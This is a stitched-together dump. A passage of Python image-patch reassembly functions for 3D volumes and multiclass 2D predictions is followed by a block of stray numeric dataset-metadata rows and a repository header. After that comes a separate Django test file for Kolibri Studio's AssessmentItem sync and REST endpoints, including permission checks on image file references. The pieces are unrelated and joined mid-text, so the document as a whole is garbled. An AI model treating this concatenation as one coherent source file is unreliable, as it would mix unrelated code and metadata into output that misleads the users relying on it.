    Same accumulation/averaging scheme as :func:`fUnpatch2D`, but the patches
    extend in all three dimensions and the z corner advances by the 3D
    not-overlap step instead of by one slice.

    :param prob_list: 2D array, one row per patch; column ``iClass`` holds the
        probability of the class of interest for that patch.
    :param patchSize: [height, width, depth] of the 3D patches.
    :param patchOverlap: overlap ratio used during patching, e.g. 0.25.
    :param actualSize: [height, width, depth] of the original volume.
    :param iClass: column index of the class to unpatch. Defaults to 1, which
        preserves the previous hard-coded ``prob_list[iIndex, 1]`` behaviour.
    :return: 3D numpy array of per-voxel mean probabilities, cropped to actualSize.
    """
    iCorner = [0, 0, 0]  # current patch corner (y, x, z)
    dOverlap = np.round(np.multiply(patchSize, patchOverlap))
    dNotOverlap = [patchSize[0] - dOverlap[0], patchSize[1] - dOverlap[1], patchSize[2] - dOverlap[2]]
    # Cast to int: np.round yields floats and float dimensions break np.zeros
    # and the final list comparison/crop on modern NumPy.
    paddedSize = [int(math.ceil((actualSize[0] - dOverlap[0]) / (dNotOverlap[0])) * dNotOverlap[0] + dOverlap[0]),
                  int(math.ceil((actualSize[1] - dOverlap[1]) / (dNotOverlap[1])) * dNotOverlap[1] + dOverlap[1]),
                  int(math.ceil((actualSize[2] - dOverlap[2]) / (dNotOverlap[2])) * dNotOverlap[2] + dOverlap[2])]
    unpatchImg = np.zeros((paddedSize[0], paddedSize[1], paddedSize[2]))  # probability sums
    numVal = np.zeros((paddedSize[0], paddedSize[1], paddedSize[2]))      # overlap counts
    for iIndex in range(0, prob_list.shape[0], 1):
        lMask = np.zeros((paddedSize[0], paddedSize[1], paddedSize[2]))
        lMask[iCorner[0]: iCorner[0] + patchSize[0], iCorner[1]: iCorner[1] + patchSize[1], iCorner[2]: iCorner[2] + patchSize[2]] = 1
        unpatchImg[iCorner[0]:iCorner[0] + patchSize[0], iCorner[1]: iCorner[1] + patchSize[1], iCorner[2]: iCorner[2] + patchSize[2]] \
            = np.add(unpatchImg[iCorner[0]: iCorner[0] + patchSize[0], iCorner[1]: iCorner[1] + patchSize[1],
                                iCorner[2]: iCorner[2] + patchSize[2]], prob_list[iIndex, iClass])
        lMask = lMask == 1
        numVal[lMask] = numVal[lMask] + 1
        # Advance the corner: x first, then y, then z.
        iCorner[1] = int(iCorner[1] + dNotOverlap[1])
        if iCorner[1] + patchSize[1] - 1 > paddedSize[1]:
            iCorner[1] = 0
            iCorner[0] = int(iCorner[0] + dNotOverlap[0])
        if iCorner[0] + patchSize[0] - 1 > paddedSize[0]:
            iCorner[0] = 0
            iCorner[1] = 0
            iCorner[2] = int(iCorner[2] + dNotOverlap[2])
            print(str(iCorner[2] / actualSize[2] * 100) + "%")
    unpatchImg = np.divide(unpatchImg, numVal)  # mean over overlapping patches
    if paddedSize == actualSize:
        pass
    else:
        # Crop the (symmetric) padding back to the original size in all dims.
        pad_y = int((paddedSize[0] - actualSize[0]) / 2)
        pad_x = int((paddedSize[1] - actualSize[1]) / 2)
        pad_z = int((paddedSize[2] - actualSize[2]) / 2)
        pad_y_max = int(paddedSize[0] - (paddedSize[0] - actualSize[0] - pad_y))
        pad_x_max = int(paddedSize[1] - (paddedSize[1] - actualSize[1] - pad_x))
        pad_z_max = int(paddedSize[2] - (paddedSize[2] - actualSize[2] - pad_z))
        unpatchImg = unpatchImg[pad_y:pad_y_max, pad_x:pad_x_max, pad_z:pad_z_max]
    return unpatchImg
def fUnpatchSegmentation(prob_list, patchSize, patchOverlap, actualSize, iClass):
    '''
    Reassemble a 3-D segmentation volume from a stack of overlapping patch
    predictions by averaging the per-voxel contributions.

    :param prob_list: per-patch predictions, indexed prob_list[iIndex, x, y, z]
        when iClass == 1000, otherwise prob_list[iIndex, x, y, z, iClass]
        -- assumed shape, confirm against the patch generator
    :param patchSize: patch extent [x, y, z]
    :param patchOverlap: fractional overlap between neighbouring patches
    :param actualSize: [x, y, z] size of the original (unpadded) volume
    :param iClass: 0 -> background, 1 -> foreground; the sentinel 1000 selects
        predictions that carry no class axis
    :return: averaged volume cropped back to actualSize
    '''
    iCorner = [0, 0, 0]  # corner (x, y, z) of the patch currently being placed
    # Voxel overlap and stride between neighbouring patches.
    dOverlap = np.round(np.multiply(patchSize, patchOverlap))
    dNotOverlap = [patchSize[0] - dOverlap[0], patchSize[1] - dOverlap[1], patchSize[2] - dOverlap[2]]
    # Smallest stride-aligned grid that covers actualSize.
    paddedSize = \
        [int(math.ceil((actualSize[0]-dOverlap[0])/(dNotOverlap[0]))*dNotOverlap[0]+dOverlap[0]),
         int(math.ceil((actualSize[1] - dOverlap[1]) / (dNotOverlap[1])) * dNotOverlap[1] + dOverlap[1]),
         int(math.ceil((actualSize[2] - dOverlap[2]) / (dNotOverlap[2])) * dNotOverlap[2] + dOverlap[2])]
    unpatchImg = np.zeros((paddedSize[0], paddedSize[1], paddedSize[2]))  # running sum of predictions
    numVal = np.zeros((paddedSize[0], paddedSize[1], paddedSize[2]))      # per-voxel contribution count
    for iIndex in range(0, prob_list.shape[0], 1):
        #print(iIndex)
        #print(iCorner)
        # Mark the voxels covered by the current patch.
        lMask = np.zeros((paddedSize[0], paddedSize[1], paddedSize[2]))
        lMask[iCorner[0]:(iCorner[0]+patchSize[0]), iCorner[1]:(iCorner[1]+patchSize[1]), iCorner[2]:(iCorner[2]+patchSize[2])] = 1
        vox = unpatchImg[iCorner[0]:(iCorner[0]+patchSize[0]),
                         iCorner[1]:(iCorner[1] + patchSize[1]),
                         iCorner[2]:(iCorner[2] + patchSize[2])]
        if iClass == 1000:
            # Sentinel: prediction carries no class axis.
            unpatchImg[iCorner[0]:(iCorner[0]+patchSize[0]), iCorner[1]:(iCorner[1]+patchSize[1]), iCorner[2]:(iCorner[2]+patchSize[2])] = \
                np.add(vox, prob_list[iIndex, :, :, :])
        else:
            unpatchImg[iCorner[0]:(iCorner[0] + patchSize[0]), iCorner[1]:(iCorner[1] + patchSize[1]), iCorner[2]:(iCorner[2] + patchSize[2])] = \
                np.add(vox, prob_list[iIndex, :, :, :, iClass])
        lMask = lMask == 1
        numVal[lMask] = numVal[lMask] + 1
        # Advance the corner: axis 1 fastest, then axis 0, then axis 2
        # (presumably the same order the patches were generated in -- TODO confirm).
        iCorner[1] = int(iCorner[1] + dNotOverlap[1])
        if iCorner[1] + patchSize[1] - 1 > paddedSize[1]:
            iCorner[1] = 0
            iCorner[0] = int(iCorner[0] + dNotOverlap[0])
            if iCorner[0] + patchSize[0] - 1 > paddedSize[0]:
                iCorner[0] = 0
                iCorner[1] = 0
                iCorner[2] = int(iCorner[2] + dNotOverlap[2])
                # Progress report: fraction of slices completed.
                print(str(iCorner[2]/actualSize[2]*100)+"%")
    # Average the overlapping contributions voxel-wise.
    unpatchImg = np.divide(unpatchImg, numVal)
    # NOTE(review): this equality only holds when actualSize is a plain list of
    # ints; with a tuple/ndarray the crop branch always runs -- confirm callers.
    if paddedSize == actualSize:
        pass
    else:
        # Crop the (roughly symmetric) padding back off each axis.
        pad_y = int((paddedSize[0] - actualSize[0]) / 2)
        pad_x = int((paddedSize[1] - actualSize[1]) / 2)
        pad_z = int((paddedSize[2] - actualSize[2]) / 2)
        pad_y_max = int(paddedSize[0] - (paddedSize[0] - actualSize[0] - pad_y))
        pad_x_max = int(paddedSize[1] - (paddedSize[1] - actualSize[1] - pad_x))
        pad_z_max = int(paddedSize[2] - (paddedSize[2] - actualSize[2] - pad_z))
        unpatchImg = unpatchImg[pad_y:pad_y_max, pad_x:pad_x_max, pad_z:pad_z_max]
    return unpatchImg
def fMulticlassUnpatch2D(prob_list, patchSize, patchOverlap, actualSize):
    '''
    Reassemble per-class prediction maps from overlapping 2-D patches taken
    slice-by-slice from a 3-D volume, averaging overlapping contributions.

    :param prob_list: per-patch class probabilities; assumed indexed as
        prob_list[iIndex, nClasses] (one probability vector per 2-D patch)
        -- TODO confirm against the patch generator
    :param patchSize: 2-D patch extent [y, x]
    :param patchOverlap: fractional overlap between neighbouring patches
    :param actualSize: [y, x, z] size of the original volume; z is not patched
    :return: array of shape (y, x, nClasses, z) cropped back to actualSize in y/x
    '''
    iCorner = [0, 0, 0]  # corner (y, x) plus current slice index z
    # In-plane overlap and stride between neighbouring patches.
    dOverlap = np.round(np.multiply(patchSize, patchOverlap))
    dNotOverlap = [patchSize[0] - dOverlap[0], patchSize[1] - dOverlap[1]]
    # Pad only the in-plane axes; the slice axis keeps its true size.
    paddedSize = [int(math.ceil((actualSize[0] - dOverlap[0]) / (dNotOverlap[0])) * dNotOverlap[0] + dOverlap[0]),
                  int(math.ceil((actualSize[1] - dOverlap[1]) / (dNotOverlap[1])) * dNotOverlap[1] + dOverlap[1]),
                  actualSize[2]]
    unpatchedPredictions = np.zeros((paddedSize[0], paddedSize[1], prob_list.shape[1], paddedSize[2]))  # summed class scores
    numVal = np.zeros((paddedSize[0], paddedSize[1], prob_list.shape[1], paddedSize[2]))                # contribution counts
    for iIndex in range(0, prob_list.shape[0], 1):
        #print(iIndex)
        #print(iCorner)
        # Mark the region (all classes) covered by the current patch on slice iCorner[2].
        lMask = np.zeros((paddedSize[0], paddedSize[1], prob_list.shape[1], paddedSize[2]))
        lMask[iCorner[0]:iCorner[0] + int(patchSize[0]), iCorner[1]:iCorner[1] + int(patchSize[1]), :, iCorner[2]] = 1
        unpatchedPredictions[iCorner[0]:iCorner[0] + int(patchSize[0]), iCorner[1]:iCorner[1] + int(patchSize[1]), :, iCorner[2]] \
            = np.add(unpatchedPredictions[iCorner[0]:iCorner[0] + int(patchSize[0]), iCorner[1]:iCorner[1] + int(patchSize[1]), :, iCorner[2]], prob_list[iIndex, :])
        lMask = lMask == 1
        numVal[lMask] = numVal[lMask] + 1
        # Advance: x fastest, then y; when a slice is finished move to the next z.
        iCorner[1] = int(iCorner[1] + dNotOverlap[1])
        if iCorner[1] + patchSize[1] - 1 > paddedSize[1]:
            iCorner[1] = 0
            iCorner[0] = int(iCorner[0] + dNotOverlap[0])
            if iCorner[0] + patchSize[0] - 1 > paddedSize[0]:
                iCorner[0] = 0
                iCorner[1] = 0
                iCorner[2] = int(iCorner[2] + 1)
                # Progress report: fraction of slices completed.
                print(str(iCorner[2] / actualSize[2] * 100) + "%")
    # Average overlapping contributions element-wise.
    unpatchImg = np.divide(unpatchedPredictions, numVal)
    # NOTE(review): equality only holds when actualSize is a plain list of ints;
    # with a tuple/ndarray the crop branch always runs -- confirm callers.
    if paddedSize == actualSize:
        pass
    else:
        # Crop the in-plane padding; z was never padded.
        pad_y = int((paddedSize[0]-actualSize[0])/2)
        pad_x = int((paddedSize[1]-actualSize[1])/2)
        pad_y_max = int(paddedSize[0]-(paddedSize[0]-actualSize[0]-pad_y))
        pad_x_max = int(paddedSize[1]-(paddedSize[1]-actualSize[1]-pad_x))
        unpatchImg = unpatchImg[pad_y:pad_y_max, pad_x:pad_x_max, :]
    return unpatchImg
| 53.715827
| 270
| 0.513895
| 1,615
| 14,933
| 4.691641
| 0.08483
| 0.048568
| 0.024944
| 0.027452
| 0.897585
| 0.897585
| 0.885707
| 0.885707
| 0.885707
| 0.885707
| 0
| 0.047746
| 0.298734
| 14,933
| 278
| 271
| 53.715827
| 0.675802
| 0.286011
| 0
| 0.779874
| 0
| 0
| 0.000411
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025157
| false
| 0.025157
| 0.012579
| 0
| 0.062893
| 0.031447
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a2d000276ce31c297bdbb2f40d4f8f71507c0a4
| 27,359
|
py
|
Python
|
contentcuration/contentcuration/tests/viewsets/test_assessmentitem.py
|
d0sadata/studio
|
ec3b805c0b546fe8884d446152eead90bea4174d
|
[
"MIT"
] | 60
|
2018-03-29T23:33:29.000Z
|
2022-03-19T12:10:56.000Z
|
contentcuration/contentcuration/tests/viewsets/test_assessmentitem.py
|
d0sadata/studio
|
ec3b805c0b546fe8884d446152eead90bea4174d
|
[
"MIT"
] | 2,260
|
2018-03-02T23:14:49.000Z
|
2022-03-29T20:57:21.000Z
|
contentcuration/contentcuration/tests/viewsets/test_assessmentitem.py
|
d0sadata/studio
|
ec3b805c0b546fe8884d446152eead90bea4174d
|
[
"MIT"
] | 86
|
2018-03-19T21:26:35.000Z
|
2022-03-28T10:09:17.000Z
|
from __future__ import absolute_import
import uuid
from django.urls import reverse
from le_utils.constants import content_kinds
from le_utils.constants import exercises
from contentcuration import models
from contentcuration.tests import testdata
from contentcuration.tests.base import StudioAPITestCase
from contentcuration.viewsets.sync.constants import ASSESSMENTITEM
from contentcuration.viewsets.sync.utils import generate_create_event
from contentcuration.viewsets.sync.utils import generate_delete_event
from contentcuration.viewsets.sync.utils import generate_update_event
class SyncTestCase(StudioAPITestCase):
    """Exercise AssessmentItem create/update/delete through the bulk ``sync`` endpoint."""

    @property
    def sync_url(self):
        """URL of the bulk sync endpoint."""
        return reverse("sync")

    @property
    def assessmentitem_metadata(self):
        """API payload for creating an assessment item (fresh id on every access)."""
        return {
            "assessment_id": uuid.uuid4().hex,
            "contentnode": self.channel.main_tree.get_descendants()
            .filter(kind_id=content_kinds.EXERCISE)
            .first()
            .id,
        }

    @property
    def assessmentitem_db_metadata(self):
        """ORM kwargs for creating an assessment item directly (fresh id on every access)."""
        return {
            "assessment_id": uuid.uuid4().hex,
            "contentnode_id": self.channel.main_tree.get_descendants()
            .filter(kind_id=content_kinds.EXERCISE)
            .first()
            .id,
        }

    def setUp(self):
        super(SyncTestCase, self).setUp()
        self.channel = testdata.channel()
        self.user = testdata.user()
        self.channel.editors.add(self.user)

    def _exercise_image_markdown(self, image_file):
        """Markdown image reference that links ``image_file`` into exercise text.

        NOTE(review): the original code called ``"".format(...)``, which discards
        every argument and therefore can never associate the file with the item
        (defeating the purpose of these tests).  Reconstructed here as Studio's
        placeholder markdown reference -- confirm against upstream.
        """
        return "![alt_text]({}/{}.{})".format(
            exercises.IMG_PLACEHOLDER, image_file.checksum, image_file.file_format_id
        )

    def test_create_assessmentitem(self):
        """A single create event creates the item."""
        self.client.force_authenticate(user=self.user)
        assessmentitem = self.assessmentitem_metadata
        response = self.client.post(
            self.sync_url,
            [
                generate_create_event(
                    [assessmentitem["contentnode"], assessmentitem["assessment_id"]],
                    ASSESSMENTITEM,
                    assessmentitem,
                )
            ],
            format="json",
        )
        self.assertEqual(response.status_code, 200, response.content)
        try:
            models.AssessmentItem.objects.get(
                assessment_id=assessmentitem["assessment_id"]
            )
        except models.AssessmentItem.DoesNotExist:
            self.fail("AssessmentItem was not created")

    def _assert_create_with_file(self, field):
        """Create an item whose ``field`` references an owned image; the file must attach."""
        self.client.force_authenticate(user=self.user)
        assessmentitem = self.assessmentitem_metadata
        image_file = testdata.fileobj_exercise_image()
        image_file.uploaded_by = self.user
        image_file.save()
        assessmentitem[field] = self._exercise_image_markdown(image_file)
        response = self.client.post(
            self.sync_url,
            [
                generate_create_event(
                    [assessmentitem["contentnode"], assessmentitem["assessment_id"]],
                    ASSESSMENTITEM,
                    assessmentitem,
                )
            ],
            format="json",
        )
        self.assertEqual(response.status_code, 200, response.content)
        try:
            ai = models.AssessmentItem.objects.get(
                assessment_id=assessmentitem["assessment_id"]
            )
        except models.AssessmentItem.DoesNotExist:
            self.fail("AssessmentItem was not created")
        try:
            file = ai.files.get()
            self.assertEqual(file.id, image_file.id)
        except models.File.DoesNotExist:
            self.fail("File was not updated")

    def test_create_assessmentitem_with_file_question(self):
        """An image reference in the question attaches the file."""
        self._assert_create_with_file("question")

    def test_create_assessmentitem_with_file_answers(self):
        """An image reference in the answers attaches the file."""
        self._assert_create_with_file("answers")

    def test_create_assessmentitem_with_file_hints(self):
        """An image reference in the hints attaches the file."""
        self._assert_create_with_file("hints")

    def test_create_assessmentitem_with_file_no_permission(self):
        """Referencing a file the user did not upload is rejected with 400."""
        self.client.force_authenticate(user=self.user)
        assessmentitem = self.assessmentitem_metadata
        image_file = testdata.fileobj_exercise_image()
        # Deliberately NOT owned by self.user.
        assessmentitem["question"] = self._exercise_image_markdown(image_file)
        response = self.client.post(
            self.sync_url,
            [
                generate_create_event(
                    [assessmentitem["contentnode"], assessmentitem["assessment_id"]],
                    ASSESSMENTITEM,
                    assessmentitem,
                )
            ],
            format="json",
        )
        self.assertEqual(response.status_code, 400, response.content)
        try:
            models.AssessmentItem.objects.get(
                assessment_id=assessmentitem["assessment_id"]
            )
            self.fail("AssessmentItem was created")
        except models.AssessmentItem.DoesNotExist:
            pass
        self.assertIsNone(image_file.assessment_item)

    def test_create_assessmentitems(self):
        """Two create events in one sync request create both items."""
        self.client.force_authenticate(user=self.user)
        assessmentitem1 = self.assessmentitem_metadata
        assessmentitem2 = self.assessmentitem_metadata
        response = self.client.post(
            self.sync_url,
            [
                generate_create_event(
                    [assessmentitem1["contentnode"], assessmentitem1["assessment_id"]],
                    ASSESSMENTITEM,
                    assessmentitem1,
                ),
                generate_create_event(
                    [assessmentitem2["contentnode"], assessmentitem2["assessment_id"]],
                    ASSESSMENTITEM,
                    assessmentitem2,
                ),
            ],
            format="json",
        )
        self.assertEqual(response.status_code, 200, response.content)
        try:
            models.AssessmentItem.objects.get(
                assessment_id=assessmentitem1["assessment_id"]
            )
        except models.AssessmentItem.DoesNotExist:
            self.fail("AssessmentItem 1 was not created")
        try:
            models.AssessmentItem.objects.get(
                assessment_id=assessmentitem2["assessment_id"]
            )
        except models.AssessmentItem.DoesNotExist:
            self.fail("AssessmentItem 2 was not created")

    def test_update_assessmentitem(self):
        """An update event changes the question field."""
        assessmentitem = models.AssessmentItem.objects.create(
            **self.assessmentitem_db_metadata
        )
        new_question = "{}"
        self.client.force_authenticate(user=self.user)
        response = self.client.post(
            self.sync_url,
            [
                generate_update_event(
                    [assessmentitem.contentnode_id, assessmentitem.assessment_id],
                    ASSESSMENTITEM,
                    {"question": new_question},
                )
            ],
            format="json",
        )
        self.assertEqual(response.status_code, 200, response.content)
        self.assertEqual(
            models.AssessmentItem.objects.get(id=assessmentitem.id).question,
            new_question,
        )

    def test_attempt_update_missing_assessmentitem(self):
        """Updating a nonexistent item returns a 400 with a 'Not found' error."""
        self.client.force_authenticate(user=self.user)
        response = self.client.post(
            self.sync_url,
            [
                generate_update_event(
                    [
                        self.channel.main_tree.get_descendants()
                        .filter(kind_id=content_kinds.EXERCISE)
                        .first()
                        .id,
                        uuid.uuid4().hex,
                    ],
                    ASSESSMENTITEM,
                    {"question": "but why is it missing in the first place?"},
                )
            ],
            format="json",
        )
        self.assertEqual(response.status_code, 400, response.content)
        self.assertEqual(response.data.get("errors")[0].get("error")[0], "Not found")

    def test_update_assessmentitem_with_file(self):
        """An update whose question references an owned image attaches the file."""
        assessmentitem = models.AssessmentItem.objects.create(
            **self.assessmentitem_db_metadata
        )
        image_file = testdata.fileobj_exercise_image()
        image_file.uploaded_by = self.user
        image_file.save()
        question = self._exercise_image_markdown(image_file)
        self.client.force_authenticate(user=self.user)
        response = self.client.post(
            self.sync_url,
            [
                generate_update_event(
                    [assessmentitem.contentnode_id, assessmentitem.assessment_id],
                    ASSESSMENTITEM,
                    {"question": question},
                )
            ],
            format="json",
        )
        self.assertEqual(response.status_code, 200, response.content)
        try:
            file = assessmentitem.files.get()
            self.assertEqual(file.id, image_file.id)
        except models.File.DoesNotExist:
            self.fail("File was not updated")

    def test_update_assessmentitem_with_file_no_permissions(self):
        """An update referencing a file the user does not own is rejected."""
        assessmentitem = models.AssessmentItem.objects.create(
            **self.assessmentitem_db_metadata
        )
        image_file = testdata.fileobj_exercise_image()
        # Deliberately NOT owned by self.user.
        question = self._exercise_image_markdown(image_file)
        self.client.force_authenticate(user=self.user)
        response = self.client.post(
            self.sync_url,
            [
                generate_update_event(
                    [assessmentitem.contentnode_id, assessmentitem.assessment_id],
                    ASSESSMENTITEM,
                    {"question": question},
                )
            ],
            format="json",
        )
        self.assertEqual(response.status_code, 400, response.content)
        try:
            file = assessmentitem.files.get()
            self.assertNotEqual(file.id, image_file.id)
            self.fail("File was updated")
        except models.File.DoesNotExist:
            pass

    def test_update_assessmentitem_remove_file(self):
        """Replacing the question with plain text detaches the previous file."""
        assessmentitem = models.AssessmentItem.objects.create(
            **self.assessmentitem_db_metadata
        )
        image_file = testdata.fileobj_exercise_image()
        image_file.assessment_item = assessmentitem
        image_file.save()
        question = "A different question"
        self.client.force_authenticate(user=self.user)
        response = self.client.post(
            self.sync_url,
            [
                generate_update_event(
                    [assessmentitem.contentnode_id, assessmentitem.assessment_id],
                    ASSESSMENTITEM,
                    {"question": question},
                )
            ],
            format="json",
        )
        self.assertEqual(response.status_code, 200, response.content)
        try:
            assessmentitem.files.get()
            self.fail("File was not removed")
        except models.File.DoesNotExist:
            pass

    def test_update_assessmentitems(self):
        """Two update events in one sync request update both items."""
        assessmentitem1 = models.AssessmentItem.objects.create(
            **self.assessmentitem_db_metadata
        )
        assessmentitem2 = models.AssessmentItem.objects.create(
            **self.assessmentitem_db_metadata
        )
        new_question = "{}"
        self.client.force_authenticate(user=self.user)
        response = self.client.post(
            self.sync_url,
            [
                generate_update_event(
                    [assessmentitem1.contentnode_id, assessmentitem1.assessment_id],
                    ASSESSMENTITEM,
                    {"question": new_question},
                ),
                generate_update_event(
                    [assessmentitem2.contentnode_id, assessmentitem2.assessment_id],
                    ASSESSMENTITEM,
                    {"question": new_question},
                ),
            ],
            format="json",
        )
        self.assertEqual(response.status_code, 200, response.content)
        self.assertEqual(
            models.AssessmentItem.objects.get(id=assessmentitem1.id).question,
            new_question,
        )
        self.assertEqual(
            models.AssessmentItem.objects.get(id=assessmentitem2.id).question,
            new_question,
        )

    def test_update_assessmentitem_empty(self):
        """An empty update payload is accepted as a no-op."""
        assessmentitem = models.AssessmentItem.objects.create(
            **self.assessmentitem_db_metadata
        )
        self.client.force_authenticate(user=self.user)
        response = self.client.post(
            self.sync_url,
            [
                generate_update_event(
                    [assessmentitem.contentnode_id, assessmentitem.assessment_id],
                    ASSESSMENTITEM,
                    {},
                )
            ],
            format="json",
        )
        self.assertEqual(response.status_code, 200, response.content)

    def test_update_assessmentitem_unwriteable_fields(self):
        """Unknown fields in an update payload are ignored, not rejected."""
        assessmentitem = models.AssessmentItem.objects.create(
            **self.assessmentitem_db_metadata
        )
        self.client.force_authenticate(user=self.user)
        response = self.client.post(
            self.sync_url,
            [
                generate_update_event(
                    [assessmentitem.contentnode_id, assessmentitem.assessment_id],
                    ASSESSMENTITEM,
                    {"not_a_field": "not_a_value"},
                )
            ],
            format="json",
        )
        self.assertEqual(response.status_code, 200, response.content)

    def test_delete_assessmentitem(self):
        """A delete event removes the item."""
        assessmentitem = models.AssessmentItem.objects.create(
            **self.assessmentitem_db_metadata
        )
        self.client.force_authenticate(user=self.user)
        response = self.client.post(
            self.sync_url,
            [
                generate_delete_event(
                    [assessmentitem.contentnode_id, assessmentitem.assessment_id],
                    ASSESSMENTITEM,
                )
            ],
            format="json",
        )
        self.assertEqual(response.status_code, 200, response.content)
        try:
            models.AssessmentItem.objects.get(id=assessmentitem.id)
            self.fail("AssessmentItem was not deleted")
        except models.AssessmentItem.DoesNotExist:
            pass

    def test_delete_assessmentitems(self):
        """Two delete events in one sync request remove both items."""
        assessmentitem1 = models.AssessmentItem.objects.create(
            **self.assessmentitem_db_metadata
        )
        assessmentitem2 = models.AssessmentItem.objects.create(
            **self.assessmentitem_db_metadata
        )
        self.client.force_authenticate(user=self.user)
        response = self.client.post(
            self.sync_url,
            [
                generate_delete_event(
                    [assessmentitem1.contentnode_id, assessmentitem1.assessment_id],
                    ASSESSMENTITEM,
                ),
                generate_delete_event(
                    [assessmentitem2.contentnode_id, assessmentitem2.assessment_id],
                    ASSESSMENTITEM,
                ),
            ],
            format="json",
        )
        self.assertEqual(response.status_code, 200, response.content)
        try:
            models.AssessmentItem.objects.get(id=assessmentitem1.id)
            self.fail("AssessmentItem 1 was not deleted")
        except models.AssessmentItem.DoesNotExist:
            pass
        try:
            models.AssessmentItem.objects.get(id=assessmentitem2.id)
            self.fail("AssessmentItem 2 was not deleted")
        except models.AssessmentItem.DoesNotExist:
            pass
class CRUDTestCase(StudioAPITestCase):
    """Exercise the plain REST endpoints for AssessmentItem (list/detail CRUD)."""

    @property
    def assessmentitem_metadata(self):
        """API payload for creating an assessment item (fresh id on every access)."""
        return {
            "assessment_id": uuid.uuid4().hex,
            "contentnode": self.channel.main_tree.get_descendants()
            .filter(kind_id=content_kinds.EXERCISE)
            .first()
            .id,
        }

    @property
    def assessmentitem_db_metadata(self):
        """ORM kwargs for creating an assessment item directly (fresh id on every access)."""
        return {
            "assessment_id": uuid.uuid4().hex,
            "contentnode_id": self.channel.main_tree.get_descendants()
            .filter(kind_id=content_kinds.EXERCISE)
            .first()
            .id,
        }

    def setUp(self):
        super(CRUDTestCase, self).setUp()
        self.channel = testdata.channel()
        self.user = testdata.user()
        self.channel.editors.add(self.user)

    def _exercise_image_markdown(self, image_file):
        """Markdown image reference that links ``image_file`` into exercise text.

        NOTE(review): the original code called ``"".format(...)``, which discards
        every argument and therefore can never associate the file with the item
        (defeating the purpose of these tests).  Reconstructed here as Studio's
        placeholder markdown reference -- confirm against upstream.
        """
        return "![alt_text]({}/{}.{})".format(
            exercises.IMG_PLACEHOLDER, image_file.checksum, image_file.file_format_id
        )

    def test_create_assessmentitem(self):
        """POST to the list endpoint creates the item."""
        self.client.force_authenticate(user=self.user)
        assessmentitem = self.assessmentitem_metadata
        response = self.client.post(
            reverse("assessmentitem-list"), assessmentitem, format="json",
        )
        self.assertEqual(response.status_code, 201, response.content)
        try:
            models.AssessmentItem.objects.get(
                assessment_id=assessmentitem["assessment_id"]
            )
        except models.AssessmentItem.DoesNotExist:
            self.fail("AssessmentItem was not created")

    def test_create_assessmentitem_no_node_permission(self):
        """Creating under a node the user cannot edit is rejected with 400."""
        self.client.force_authenticate(user=self.user)
        new_channel = testdata.channel()
        new_channel_exercise = (
            new_channel.main_tree.get_descendants()
            .filter(kind_id=content_kinds.EXERCISE)
            .first()
            .id
        )
        assessmentitem = self.assessmentitem_metadata
        assessmentitem["contentnode"] = new_channel_exercise
        response = self.client.post(
            reverse("assessmentitem-list"), assessmentitem, format="json",
        )
        self.assertEqual(response.status_code, 400, response.content)

    def test_create_assessmentitem_with_file(self):
        """An image reference in the question attaches the owned file."""
        self.client.force_authenticate(user=self.user)
        assessmentitem = self.assessmentitem_metadata
        image_file = testdata.fileobj_exercise_image()
        image_file.uploaded_by = self.user
        image_file.save()
        assessmentitem["question"] = self._exercise_image_markdown(image_file)
        response = self.client.post(
            reverse("assessmentitem-list"), assessmentitem, format="json",
        )
        self.assertEqual(response.status_code, 201, response.content)
        try:
            ai = models.AssessmentItem.objects.get(
                assessment_id=assessmentitem["assessment_id"]
            )
        except models.AssessmentItem.DoesNotExist:
            self.fail("AssessmentItem was not created")
        try:
            file = ai.files.get()
            self.assertEqual(file.id, image_file.id)
        except models.File.DoesNotExist:
            self.fail("File was not updated")

    def test_create_assessmentitem_with_file_no_permission(self):
        """Referencing a file the user did not upload is rejected with 400."""
        self.client.force_authenticate(user=self.user)
        assessmentitem = self.assessmentitem_metadata
        image_file = testdata.fileobj_exercise_image()
        # Deliberately NOT owned by self.user.
        assessmentitem["question"] = self._exercise_image_markdown(image_file)
        response = self.client.post(
            reverse("assessmentitem-list"), assessmentitem, format="json",
        )
        self.assertEqual(response.status_code, 400, response.content)
        try:
            models.AssessmentItem.objects.get(
                assessment_id=assessmentitem["assessment_id"]
            )
            self.fail("AssessmentItem was created")
        except models.AssessmentItem.DoesNotExist:
            pass
        self.assertIsNone(image_file.assessment_item)

    def test_update_assessmentitem(self):
        """PATCH to the detail endpoint updates the question."""
        assessmentitem = models.AssessmentItem.objects.create(
            **self.assessmentitem_db_metadata
        )
        new_question = "{}"
        self.client.force_authenticate(user=self.user)
        response = self.client.patch(
            reverse("assessmentitem-detail", kwargs={"pk": assessmentitem.id}),
            {"question": new_question},
            format="json",
        )
        self.assertEqual(response.status_code, 200, response.content)
        self.assertEqual(
            models.AssessmentItem.objects.get(id=assessmentitem.id).question,
            new_question,
        )

    def test_update_assessmentitem_empty(self):
        """An empty PATCH payload is accepted as a no-op."""
        assessmentitem = models.AssessmentItem.objects.create(
            **self.assessmentitem_db_metadata
        )
        self.client.force_authenticate(user=self.user)
        response = self.client.patch(
            reverse("assessmentitem-detail", kwargs={"pk": assessmentitem.id}),
            {},
            format="json",
        )
        self.assertEqual(response.status_code, 200, response.content)

    def test_update_assessmentitem_unwriteable_fields(self):
        """Unknown fields in a PATCH payload are ignored, not rejected."""
        assessmentitem = models.AssessmentItem.objects.create(
            **self.assessmentitem_db_metadata
        )
        self.client.force_authenticate(user=self.user)
        response = self.client.patch(
            reverse("assessmentitem-detail", kwargs={"pk": assessmentitem.id}),
            {"not_a_field": "not_a_value"},
            format="json",
        )
        self.assertEqual(response.status_code, 200, response.content)

    def test_update_assessmentitem_with_file(self):
        """A PATCH whose question references an owned image attaches the file."""
        assessmentitem = models.AssessmentItem.objects.create(
            **self.assessmentitem_db_metadata
        )
        image_file = testdata.fileobj_exercise_image()
        image_file.uploaded_by = self.user
        image_file.save()
        question = self._exercise_image_markdown(image_file)
        self.client.force_authenticate(user=self.user)
        response = self.client.patch(
            reverse("assessmentitem-detail", kwargs={"pk": assessmentitem.id}),
            {"question": question},
            format="json",
        )
        self.assertEqual(response.status_code, 200, response.content)
        try:
            file = assessmentitem.files.get()
            self.assertEqual(file.id, image_file.id)
        except models.File.DoesNotExist:
            self.fail("File was not updated")

